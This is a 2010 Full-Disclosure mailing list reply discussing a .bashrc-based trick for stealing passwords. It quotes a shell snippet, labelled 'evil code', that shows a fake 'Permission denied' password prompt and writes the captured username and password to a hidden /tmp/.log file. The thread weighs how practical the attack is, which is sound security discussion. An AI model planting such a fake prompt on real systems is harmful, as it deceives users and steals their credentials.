mailing list archives
Re: PuTTY private key passphrase stealing attack
From: Joachim Schipper <joachim () joachimschipper nl>
Date: Wed, 2 Jun 2010 21:41:28 +0200
On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote:
all controls like MOTD can be bypassed ...
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
echo -en "Permission denied, please try again.\n"
echo -en "$mUn () $mIP's password:"
echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log
echo -en "\n"
Apart from this, we already need to have root access to replace any .bashrc
file ... this is not really an attack but a social engineering attack ....
if we had root access we could attach sshd to the strace and get any
password etc all details ....
But note that someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.
It's a bit of a stretch, but not impossible.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/